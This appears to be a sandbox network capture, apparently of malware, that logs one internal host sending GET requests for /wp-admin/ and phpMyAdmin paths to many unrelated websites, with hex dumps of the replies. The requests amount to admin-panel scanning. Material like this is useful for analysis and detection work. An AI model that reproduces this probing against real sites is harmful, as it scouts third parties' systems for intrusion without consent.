2023-12-22 20:14:59 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.4	62462	34.136.28.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	221	OUT	GET /wp-admin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://ispsolucoes.com/wp-login.php
2023-12-22 20:15:00 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPo0DAk6-6jdAtfWBi_TvPcuX1NTRaXTF9mfZ5gLB3Xjtw7th-6Hq0Cp5zB3bGlui1oMhUnz3q2kPQ date: Fri, 22 Dec 2023 20:14:59 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:14:59 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:00 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.4	62606	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	368	OUT	GET /wp-admin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://loghole.com/wp-login.php
2023-12-22 20:14:59 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Ox1018FwvGA3hSH6Gv/iRkemLmr9UB5Sl+bBPt662fGCXf8GwyxmiWO8m2dFC4CxrNekUND46OAGU/YicVQz0A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:59 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.4	62716	104.26.6.37	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	319	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip Cookie: site_version_phase=108; site_version=HDv3 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.hugedomains.com/domain_profile.cfm?d=vixej.com
2023-12-22 20:15:00 UTC	643	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QlftSczP4zSuNhyEQn8pJ2G0gpebk%2BMe%2FBC%2BFDnHTXwhElfgMjcTHa9jQ4epHN8ADPDPp3S47piQalOzoEWcWqfJU6C%2FjDeNWbjrRUowkcxFvN%2BE%2B8sFzbIFEyyFHkSPN1L%2FZ18%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c8ef5e4c30-MIA
2023-12-22 20:15:00 UTC	726	IN	Data Raw: 61 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 Data Ascii: a51<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: s/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name
2023-12-22 20:15:00 UTC	553	IN	Data Raw: 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 2f 2a 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 29 3b 20 2a 2f 0d 0a 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 37 31 31 37 33 33 39 2d 34 27 2c 20 7b 0d 0a 27 63 75 73 74 6f 6d 5f 6d 61 70 27 3a 20 7b 0d 0a 27 64 69 6d 65 6e 73 69 6f 6e 33 27 3a 20 27 73 69 74 65 76 65 72 73 69 6f 6e 27 0d 0a 7d 0d 0a 7d 29 3b 0d 0a 67 74 61 67 28 27 65 76 65 Data Ascii: pt>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());/* gtag('config', 'UA-7117339-4'); */gtag('config', 'UA-7117339-4', {'custom_map': {'dimension3': 'siteversion'}});gtag('eve
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 42 75 72 67 65 72 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 6e 61 76 54 6f 67 67 6c 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4e 61 76 69 67 61 74 69 6f 6e 20 54 6f 67 67 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 63 66 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 68 75 67 65 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 5f 6e 6f 74 61 67 5f 77 68 69 74 65 2e 70 6e 67 0d 0a 22 20 61 6c 74 3d Data Ascii: 7ffa<div class="navBurger" role="button" id="navToggle" aria-label="Navigation Toggle"></div><a class="logo" href="https://www.HugeDomains.com/index.cfm"><img src="https://static.HugeDomains.com/images/hdv3-img/hugedomains_logo_notag_white.png" alt=
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 20 68 65 69 67 68 74 3a 33 35 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 77 69 64 74 68 3a 39 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 20 63 69 72 63 75 6c 61 72 42 6c 61 63 6b 4a 20 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 Data Ascii: "return false;" style=" height:35px; min-width:90px; width:90px; padding-left:0px; padding-right:0px; padding-bottom:0px; padding-top:0px; margin-bottom:0px; overflow:hidden;"><div class="circularJ circularBlackJ " style="margin-left:0px; margin-right:0p
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 6f 6e 74 61 63 74 2e 63 66 6d 22 3e 43 6f 6e 74 61 63 74 20 75 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 6c 6f 67 69 6e 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 3e 4d 79 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 70 2d 6c 69 6e 6b 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 69 63 6f 6e 20 66 61 76 Data Ascii: nk " href="https://www.HugeDomains.com/contact.cfm">Contact us</b></a></li><li class="nav-item"><a href="https://www.HugeDomains.com/payment-plan-login.cfm" class="nav-link ">My account</a></li></ul><div class="shop-links"><div class="cart-icon fav
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 62 69 67 2d 74 65 78 74 20 67 72 65 65 6e 22 3e 24 34 2c 39 39 35 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 Data Ascii: big-text green">$4,995</span></span><a href="https://www.HugeDomains.com/shopping_cart.cfm?d=Vixej&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID'
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 39 37 50 50 50 72 6f 63 65 49 44 22 20 63 6c 61 73 73 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 Data Ascii: 97PPProceID" class=" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 2e 63 6f 6d 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 31 35 44 41 36 30 34 45 44 32 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 31 35 44 41 36 30 34 45 44 32 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 Data Ascii: ping_cart.cfm?d=Vixej.com" method="post" id="landerFormC5F2663DBC25407882A24415DA604ED2ID"><input type="hidden" name="cartCheck" value="0" id="landerFormC5F2663DBC25407882A24415DA604ED2CheckID"></form><script>function landerFuncC5F2663DBC25407882A244
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 26 23 39 36 35 36 3b 20 42 75 79 20 6e 6f 77 3c 2f 61 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 72 6f 63 65 49 44 22 20 63 6c 61 73 73 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 31 37 30 70 78 3b 20 Data Ascii: nc(); return false;">▸ Buy now</a><button type="button" value id="hdv3Billboard197BuyTabProceID" class=" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:170px;

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.4	62759	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	215	OUT	GET /wp-admin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://bldowney.com/wp-login.php
2023-12-22 20:15:01 UTC	495	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:00 GMT Server: Apache P3P: CP="NOI" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=dab9654e76fcb87f013f9734233b1b7a; path=/ Upgrade: h2,h2c Connection: Upgrade, close Location: https://bldowney.com/wordpress/wp-login.php?redirect_to=https%3A%2F%2Fbldowney.com%2Fwp-admin%2F&reauth=1 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.4	62594	52.165.155.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	317	OUT	GET /wp-admin/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://intermountainmls.com/wp-login.php
2023-12-22 20:15:00 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:14:59 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:00 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.4	62595	217.146.69.50	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:59 UTC	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: pistik.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	259	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:00 GMT Server: Apache / ZoneOS Connection: Upgrade, close Last-Modified: Mon, 23 Oct 2023 21:31:51 GMT ETag: "1d7b-60868f3479039" Accept-Ranges: bytes Content-Length: 7547 Content-Type: text/html
2023-12-22 20:15:00 UTC	7547	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.4	62796	64.68.191.221	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
